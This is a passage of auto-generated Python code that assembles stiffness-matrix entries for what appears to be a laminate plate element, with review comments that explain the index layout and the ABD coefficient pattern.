k0[i3*dof+0, i3*dof+4] += Ac*((B12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i3*dof+0, i4*dof+0] += Ac*((A11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (A16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i3*dof+0, i4*dof+1] += Ac*((A12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (A16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + A66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i3*dof+0, i4*dof+3] += Ac*((B11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i3*dof+0, i4*dof+4] += Ac*((B12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i3*dof+1, i1*dof+0] += Ac*((A12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (A26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i3*dof+1, i1*dof+1] += Ac*((A22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (A26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i3*dof+1, i1*dof+3] += Ac*((B12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i3*dof+1, i1*dof+4] += Ac*((B22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i3*dof+1, i2*dof+0] += Ac*((A12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (A26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i3*dof+1, i2*dof+1] += Ac*((A22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (A26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i3*dof+1, i2*dof+3] += Ac*((B12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
# --- Auto-generated stiffness-matrix assembly fragment (review notes) ---
# Every statement below accumulates (+=) one scalar entry of the matrix k0.
# Row/column indices are formed as (node_index*dof + local_dof) with node
# indices i1..i4 and local DOFs {0, 1, 3, 4}.
# Visible coefficient pattern in this fragment:
#   * A11..A66 multiply (local DOF 0/1) x (local DOF 0/1) entries,
#   * B11..B66 multiply mixed (0/1) x (3/4) entries,
#   * D11..D66 multiply (3/4) x (3/4) entries,
# which is consistent with laminate ABD (membrane/coupling/bending)
# stiffness terms — presumably DOFs 0,1 are in-plane and 3,4 are rotations;
# TODO confirm against the code generator / element formulation.
# The recurring subexpression
#   (f1c*le1*nx1 + f2c*le2*nx2 + f3c*le3*nx3 + f4c*le4*nx4)/Ac
# looks like a smoothed derivative operator: fij weights times edge lengths
# le1..le4 times edge-normal components nx*/ny*, normalized by a cell area
# Ac — NOTE(review): names suggest this; verify against the generator.
# Do not hand-edit individual terms: the B16/B26 (and D16/D26) placement
# deliberately differs between transposed entry pairs.
# (continuation of the row group k0[i3*dof+1, i2*dof+*])
k0[i3*dof+1, i2*dof+4] += Ac*((B22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
# -- row i3*dof+1: columns at node i3 and node i4 --
k0[i3*dof+1, i3*dof+0] += Ac*((A12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (A26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i3*dof+1, i3*dof+1] += Ac*((A22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (A26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i3*dof+1, i3*dof+3] += Ac*((B12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i3*dof+1, i3*dof+4] += Ac*((B22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i3*dof+1, i4*dof+0] += Ac*((A12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (A26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i3*dof+1, i4*dof+1] += Ac*((A22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (A26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + A66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i3*dof+1, i4*dof+3] += Ac*((B12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i3*dof+1, i4*dof+4] += Ac*((B22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
# -- row i3*dof+3 (B/D coefficients): columns at nodes i1..i4 --
k0[i3*dof+3, i1*dof+0] += Ac*((B11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i3*dof+3, i1*dof+1] += Ac*((B12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i3*dof+3, i1*dof+3] += Ac*((D11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (D16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i3*dof+3, i1*dof+4] += Ac*((D12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (D16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i3*dof+3, i2*dof+0] += Ac*((B11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i3*dof+3, i2*dof+1] += Ac*((B12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i3*dof+3, i2*dof+3] += Ac*((D11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (D16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i3*dof+3, i2*dof+4] += Ac*((D12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (D16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i3*dof+3, i3*dof+0] += Ac*((B11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i3*dof+3, i3*dof+1] += Ac*((B12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i3*dof+3, i3*dof+3] += Ac*((D11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (D16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i3*dof+3, i3*dof+4] += Ac*((D12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (D16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i3*dof+3, i4*dof+0] += Ac*((B11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i3*dof+3, i4*dof+1] += Ac*((B12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + B66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i3*dof+3, i4*dof+3] += Ac*((D11*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D16*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (D16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i3*dof+3, i4*dof+4] += Ac*((D12*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (D16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + D66*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
# -- row i3*dof+4 (B/D coefficients): columns at nodes i1..i4 --
k0[i3*dof+4, i1*dof+0] += Ac*((B12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i3*dof+4, i1*dof+1] += Ac*((B22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i3*dof+4, i1*dof+3] += Ac*((D12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac + (D26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac)
k0[i3*dof+4, i1*dof+4] += Ac*((D22*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D26*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (D26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + D66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i3*dof+4, i2*dof+0] += Ac*((B12*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B16*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B26*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + B66*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
